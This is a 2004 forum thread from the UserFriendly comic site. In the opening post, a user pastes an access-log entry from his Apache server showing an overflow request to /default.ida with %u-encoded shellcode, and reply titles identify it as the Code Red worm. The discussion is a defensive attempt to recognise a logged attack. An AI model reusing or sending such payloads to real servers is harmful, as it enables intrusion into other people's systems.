The Daily Static
  The Daily Static
UF Archives
Register
UF Membership
Ad Free Site
Postcards
Community
Geekfinder
UFie Gear
Advertise on UF
Forum Rules
& FAQ

Username

Password


Create a New Account

  
 

Back to UserFriendly Strip Comments Index
Ever seen an Apache buffer-overflow attack? by bobmon 2004-09-24 06:06:21
I'm guessing this is one, courtesy of my access log. I'd black out the sender's IP address, but why bother? It's not anyone I particularly care to protect... may be spoofed anyway. (anyone know who "in.apnic.net" is?)

61.54.163.19 - - [20/Sep/2004:16:49:14 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78 01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

Next problem: find the time and method to figure out whether it succeeded... :-(

[ Reply ]
  I've had several attempts at that on my box by wheresthefish2004-09-24 06:14:21
  Code Red by hekatombe2006-11-19 12:55:59
  It looks like a Code Red attack. by IByte2006-11-19 12:55:59
  If it's a buffer overflow bug, by LionsPhil2004-09-24 06:25:21
    When I first read that, I thought you said by crash_2004-09-24 06:44:14
      Mind meet gutter... by Avium2004-09-24 06:46:13
        What, bugs sauteeed in butter would get Modded? (n (n/t) by webishop2004-09-24 06:51:48
          This is UF. by Avium2004-09-24 06:57:15
            If you're a stronger drainage margarine, are you a by bobmon2004-09-24 07:02:25
    I'm afraid to infer from that, that the presence by bobmon2004-09-24 06:47:42
  thanks for the "Code Red" feedback... by bobmon2004-09-24 06:59:32
  if you're still concerned by psychoi3oy2004-09-24 07:22:30
    /me do that thing. Thanks. (n/t) by bobmon2004-09-24 10:14:34

 

[Todays Cartoon Discussion] [News Index]

Come get yer ARS (Account Registration System) Source Code here!
All images, characters, content and text are copyrighted and trademarks of J.D. Frazer except where other ownership applies. Don't do bad things, we have lawyers.
UserFriendly.Org and its operators are not liable for comments or content posted by its visitors, and will cheerfully assist the lawful authorities in hunting down script-kiddies, spammers and other net scum. And if you're really bad, we'll call your mom. (We're not kidding, we've done it before.)